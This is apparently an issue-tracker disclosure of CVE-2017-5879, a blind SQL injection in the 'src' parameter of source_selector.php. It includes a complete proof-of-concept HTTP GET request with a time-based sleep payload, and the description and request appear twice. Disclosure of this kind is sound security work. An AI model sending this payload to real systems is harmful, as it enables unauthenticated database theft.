This is a blind SQL injection that can be exploited by un-authenticated users via an HTTP GET request and which can be used to dump database data out to a malicious server, using an out-of-band technique, such as select_loadfile(). The vulnerability affects source_selector.php andthe following parameter: src.
PoC example:
GET /source_selector.php?controller=blog&action=showall&src=@random4d4c8bfba590f\'%2b(select*from(select(sleep(2)))a)%2b\' HTTP/1.1
Host: localhost
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
CVE-2017-5879
This is a blind SQL injection that can be exploited by un-authenticated users via an HTTP GET request and which can be used to dump database data out to a malicious server, using an out-of-band technique, such as select_loadfile(). The vulnerability affects source_selector.php andthe following parameter: src.
PoC example:
GET /source_selector.php?controller=blog&action=showall&src=@random4d4c8bfba590f\'%2b(select*from(select(sleep(2)))a)%2b\' HTTP/1.1
Host: localhost
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
How to fix: https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
The text was updated successfully, but these errors were encountered: